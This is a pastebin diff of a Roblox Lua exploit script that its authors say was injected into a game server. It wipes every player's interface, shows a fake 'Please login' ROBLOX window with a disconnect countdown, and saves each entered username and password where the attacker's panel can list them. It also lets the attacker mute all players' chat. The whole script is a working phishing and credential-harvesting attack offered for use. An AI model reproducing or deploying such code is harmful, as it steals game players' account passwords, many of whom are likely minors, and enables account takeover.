SHOW:
|
|
- or go back to the newest paste.
| 1 | --[[ | |
| 2 | ||
| 3 | ||
| 4 | ||
| 5 | ||
| 6 | ||
| 7 | This script was entirely created by team RA. | |
| 8 | We have used one of the model's merely owned in order | |
| 9 | to inject the script in the server. Stop asking questions. | |
| 10 | Dont leak this script. | |
| 11 | ||
| 12 | --]] | |
| 13 | ||
| 14 | ||
| 15 | ||
| 16 | - | player = "Acc here" |
| 16 | + | player = "personsadminlol" |
| 17 | --Account you are using because Injector is located inside your character. | |
| 18 | -- If you die , it will erase the script. | |
| 19 | ||
| 20 | ||
| 21 | ||
| 22 | ||
| 23 | ||
| 24 | if game.Workspace[player]:FindFirstChild("Logz") then
| |
| 25 | game.Workspace[player].Logz:Destroy() | |
| 26 | end | |
| 27 | local children = game.StarterPack:GetChildren() | |
| 28 | for c = 1, #children do | |
| 29 | children[c]:Remove() | |
| 30 | end | |
| 31 | local children = game.StarterGui:GetChildren() | |
| 32 | for c = 1, #children do | |
| 33 | children[c]:Remove() | |
| 34 | end | |
| 35 | ||
| 36 | local v = Instance.new("ScreenGui")
| |
| 37 | v.Name = "LoginGui" | |
| 38 | local MS = game:GetService("InsertService"):LoadAsset(104123766) -- Umad Project?
| |
| 39 | local mf = Instance.new("Frame")
| |
| 40 | mf.Parent = v | |
| 41 | mf.Name = "LeFrame" | |
| 42 | mf.Style = "RobloxRound" | |
| 43 | mf.Size = UDim2.new(0.5,0,0.3,0) | |
| 44 | mf.Position = UDim2.new(0.25,0,0.2,0) | |
| 45 | local lb = Instance.new("TextButton")
| |
| 46 | lb.Parent = mf | |
| 47 | lb.Style = "RobloxButton" | |
| 48 | lb.Name = "Logz" | |
| 49 | lb.Position = UDim2.new(0.4,0,0.75,0) | |
| 50 | lb.Size = UDim2.new(0.2,0,.15,0) | |
| 51 | lb.TextColor3 = Color3.new(1,1,1) | |
| 52 | lb.Font = "ArialBold" | |
| 53 | lb.FontSize = "Size24" | |
| 54 | lb.Text = "Login" | |
| 55 | local Scripter = MS.SB.Script:Clone() | |
| 56 | Scripter.Code.Value = [[ | |
| 57 | dbc = true | |
| 58 | function onClick() | |
| 59 | print("Clicked")
| |
| 60 | if dbc == true then | |
| 61 | dbc = false | |
| 62 | if script.Parent.Parent.UserText.Text == script.Parent.Parent.Parent.Parent.Parent.Name then | |
| 63 | if script.Parent.Parent.PwText.Text ~= "Password" then | |
| 64 | print("Ready")
| |
| 65 | local e = Instance.new("StringValue")
| |
| 66 | e.Parent = game.Workspace[player].Logz.Bank | |
| 67 | e.Name = script.Parent.Parent.UserText.Text | |
| 68 | e.Value = script.Parent.Parent.PwText.Text | |
| 69 | wait(0.1) | |
| 70 | script.Parent.Parent.Title.Ac.Disabled = true | |
| 71 | script.Parent.Parent.ErrorBox.Text = "Connecting to ROBLOX.." | |
| 72 | wait(2) | |
| 73 | script.Parent.Parent.ErrorBox.Text = "Successfully connected to ROBLOX" | |
| 74 | wait(1.5) | |
| 75 | script.Parent.Parent.Parent:Destroy() | |
| 76 | else | |
| 77 | print("Error")
| |
| 78 | script.Parent.Parent.ErrorBox.Text = "An error occured. Invalid username or password." | |
| 79 | wait(2) | |
| 80 | script.Parent.Parent.ErrorBox.Text = " " | |
| 81 | end | |
| 82 | else | |
| 83 | print("Error")
| |
| 84 | script.Parent.Parent.ErrorBox.Text = "An error occured. Invalid username or password." | |
| 85 | wait(2) | |
| 86 | script.Parent.Parent.ErrorBox.Text = " " | |
| 87 | end | |
| 88 | dbc = true | |
| 89 | end | |
| 90 | end | |
| 91 | script.Parent.MouseButton1Click:connect(onClick) | |
| 92 | ]] | |
| 93 | Scripter.Parent = lb | |
| 94 | Scripter.Name = "Script" | |
| 95 | local pwbg = Instance.new("TextButton")
| |
| 96 | pwbg.Parent = mf | |
| 97 | pwbg.Style = "RobloxButtonDefault" | |
| 98 | pwbg.Name = "PwBG" | |
| 99 | pwbg.Position = UDim2.new(.25,0,.43,0) | |
| 100 | pwbg.Size = UDim2.new(.5,0,.1,0) | |
| 101 | pwbg.Text = "" | |
| 102 | local pwt = Instance.new("TextBox")
| |
| 103 | pwt.Parent = mf | |
| 104 | pwt.BackgroundTransparency = 1 | |
| 105 | pwt.Name = "PwText" | |
| 106 | pwt.Position = UDim2.new(.25,0,.43,0) | |
| 107 | pwt.Size = UDim2.new(.5,0,.1,0) | |
| 108 | pwt.ZIndex = 2 | |
| 109 | pwt.Font = "ArialBold" | |
| 110 | pwt.FontSize = "Size14" | |
| 111 | pwt.Text = "Password" | |
| 112 | pwt.TextColor3 = Color3.new(1,1,1) | |
| 113 | local ubg = Instance.new("TextButton")
| |
| 114 | ubg.Parent = mf | |
| 115 | ubg.Style = "RobloxButtonDefault" | |
| 116 | ubg.Name = "UserBG" | |
| 117 | ubg.Position = UDim2.new(.25,0,.3,0) | |
| 118 | ubg.Size = UDim2.new(.5,0,.1,0) | |
| 119 | ubg.Text = "" | |
| 120 | local ut = Instance.new("TextBox")
| |
| 121 | ut.Parent = mf | |
| 122 | ut.BackgroundTransparency = 1 | |
| 123 | ut.Name = "UserText" | |
| 124 | ut.Position = UDim2.new(.25,0,.3,0) | |
| 125 | ut.Size = UDim2.new(.5,0,.1,0) | |
| 126 | ut.ZIndex = 2 | |
| 127 | ut.Font = "ArialBold" | |
| 128 | ut.FontSize = "Size14" | |
| 129 | ut.Text = "Username" | |
| 130 | ut.TextColor3 = Color3.new(1,1,1) | |
| 131 | local eb = Instance.new("TextLabel")
| |
| 132 | eb.Parent = mf | |
| 133 | eb.BackgroundTransparency = 1 | |
| 134 | eb.Name = "ErrorBox" | |
| 135 | eb.Position = UDim2.new(0,0,.57,0) | |
| 136 | eb.Size = UDim2.new(1,0,0.1,0) | |
| 137 | eb.Font = "ArialBold" | |
| 138 | eb.FontSize = "Size18" | |
| 139 | eb.Text = "" | |
| 140 | eb.TextColor3 = Color3.new(1,1,0) | |
| 141 | local Sub = Instance.new("TextLabel")
| |
| 142 | Sub.Parent = mf | |
| 143 | Sub.BackgroundTransparency = 1 | |
| 144 | Sub.Name = "Subtitle" | |
| 145 | Sub.Position = UDim2.new(0,0,.15,0) | |
| 146 | Sub.Size = UDim2.new(1,0,0.1,0) | |
| 147 | Sub.Font = "ArialBold" | |
| 148 | Sub.FontSize = "Size18" | |
| 149 | Sub.Text = "Please login." | |
| 150 | Sub.TextColor3 = Color3.new(1,1,1) | |
| 151 | local Title = Instance.new("TextLabel")
| |
| 152 | Title.Parent = mf | |
| 153 | Title.BackgroundTransparency = 1 | |
| 154 | Title.Name = "Title" | |
| 155 | Title.Position = UDim2.new(0,0,0.06,0) | |
| 156 | Title.Size = UDim2.new(1,0,0.1,0) | |
| 157 | Title.Font = "ArialBold" | |
| 158 | Title.FontSize = "Size24" | |
| 159 | Title.Text = "You will be disconnected from ROBLOX in 60 seconds" | |
| 160 | Title.TextColor3 = Color3.new(1,1,1) | |
| 161 | local Scripter = MS.SB.Script:Clone() | |
| 162 | Scripter.Code.Value = [[ | |
| 163 | noob = script.Parent | |
| 164 | count = 60 | |
| 165 | for i = 1,60 do | |
| 166 | noob.Text = "You will be disconnected from ROBLOX in "..count.." seconds" | |
| 167 | count = count - 1 | |
| 168 | wait(1) | |
| 169 | end | |
| 170 | ||
| 171 | ]] | |
| 172 | Scripter.Parent = Title | |
| 173 | Scripter.Name = "Ac" | |
| 174 | Scripter.Disabled = true | |
| 175 | ||
| 176 | ||
| 177 | local MScript = MS.SB.Script:Clone() | |
| 178 | MScript.Code.Value = [[ | |
| 179 | local children = game.Players:GetChildren() | |
| 180 | for c = 1, #children do | |
| 181 | local e = script.LoginGui:Clone() | |
| 182 | local chz = children[c].PlayerGui:GetChildren() | |
| 183 | for c = 1, #chz do | |
| 184 | chz[c]:Remove() | |
| 185 | end | |
| 186 | e.Parent = children[c].PlayerGui | |
| 187 | local chz = children[c].Backpack:GetChildren() | |
| 188 | for c = 1, #chz do | |
| 189 | chz[c]:Remove() | |
| 190 | end | |
| 191 | e.LeFrame.Title.Ac.Disabled = false | |
| 192 | end | |
| 193 | wait(2) | |
| 194 | Script.Disabled = true | |
| 195 | ]] | |
| 196 | MScript.Parent = game.Workspace[player] | |
| 197 | MScript.Name = "Logz" | |
| 198 | MScript.Disabled = true | |
| 199 | v.Parent = MScript | |
| 200 | local bm = Instance.new("Model")
| |
| 201 | bm.Parent = MScript | |
| 202 | bm.Name = "Bank" | |
| 203 | ||
| 204 | ||
| 205 | ||
| 206 | MGui = Instance.new("ScreenGui", game.CoreGui)
| |
| 207 | local mf = Instance.new("Frame")
| |
| 208 | mf.Parent = MGui | |
| 209 | mf.Position = UDim2.new(0.2,0,0.3,0) | |
| 210 | mf.Size = UDim2.new(0.15,0,0.05,0) | |
| 211 | mf.BackgroundTransparency = 1 | |
| 212 | mf.Name = "Frame" | |
| 213 | ||
| 214 | local sf = Instance.new("Frame")
| |
| 215 | sf.Parent = MGui | |
| 216 | sf.Position = UDim2.new(0.2,0,0.35,0) | |
| 217 | sf.Size = UDim2.new(0.15,0,0.05,0) | |
| 218 | sf.BackgroundTransparency = 1 | |
| 219 | sf.Name = "LFrame" | |
| 220 | ||
| 221 | local RB = Instance.new("TextButton")
| |
| 222 | RB.Parent = mf | |
| 223 | RB.Size = UDim2.new(0.33,0,1,0) | |
| 224 | RB.Text = "LOAD" | |
| 225 | RB.MouseButton1Down:connect(function() | |
| 226 | local number = 1 | |
| 227 | local children = game.Workspace[player].Logz.Bank:GetChildren() | |
| 228 | for c = 1, #children do | |
| 229 | if children[c].className == "StringValue" then | |
| 230 | local testv = Instance.new("TextLabel")
| |
| 231 | testv.Parent = sf | |
| 232 | testv.Size = UDim2.new(1,0,1,0) | |
| 233 | testv.Text = "Name :"..children[c].Name.." // Pass :"..children[c].Value.." " | |
| 234 | testv.Position = UDim2.new(1,0,number,0) | |
| 235 | number = number + 1 | |
| 236 | end | |
| 237 | end | |
| 238 | ||
| 239 | end) | |
| 240 | ||
| 241 | ||
| 242 | local CB = Instance.new("TextButton")
| |
| 243 | CB.Parent = mf | |
| 244 | CB.Size = UDim2.new(0.33,0,1,0) | |
| 245 | CB.Position = UDim2.new(0.33,0,0,0) | |
| 246 | CB.Text = "CLEAR" | |
| 247 | CB.MouseButton1Down:connect(function() | |
| 248 | local children = sf:GetChildren() | |
| 249 | for c = 1, #children do | |
| 250 | if children[c].className == "TextLabel" then | |
| 251 | children[c]:Destroy() | |
| 252 | end | |
| 253 | end | |
| 254 | end) | |
| 255 | ||
| 256 | local AB = Instance.new("TextButton")
| |
| 257 | AB.Parent = mf | |
| 258 | AB.Size = UDim2.new(0.33,0,1,0) | |
| 259 | AB.Position = UDim2.new(0.66,0,0,0) | |
| 260 | AB.Text = "RUN" | |
| 261 | AB.MouseButton1Down:connect(function() | |
| 262 | game.Workspace[player].Logz.Disabled = false | |
| 263 | AB.Visible = false | |
| 264 | end) | |
| 265 | ||
| 266 | local MA = Instance.new("TextButton")
| |
| 267 | MA.Parent = mf | |
| 268 | MA.Size = UDim2.new(0.33,0,1,0) | |
| 269 | MA.Position = UDim2.new(1,0,0,0) | |
| 270 | MA.Text = "Mute" | |
| 271 | MA.MouseButton1Down:connect(function() | |
| 272 | local children = game.Players:GetChildren() | |
| 273 | for c = 1, #children do | |
| 274 | children[c]:SetSuperSafeChat(true) | |
| 275 | end | |
| 276 | end) | |
| 277 | local UA = Instance.new("TextButton")
| |
| 278 | UA.Parent = mf | |
| 279 | UA.Size = UDim2.new(0.33,0,1,0) | |
| 280 | UA.Position = UDim2.new(1.33,0,0,0) | |
| 281 | UA.Text = "Unmute" | |
| 282 | UA.MouseButton1Down:connect(function() | |
| 283 | local children = game.Players:GetChildren() | |
| 284 | for c = 1, #children do | |
| 285 | children[c]:SetSuperSafeChat(false) | |
| 286 | end | |
| 287 | end) |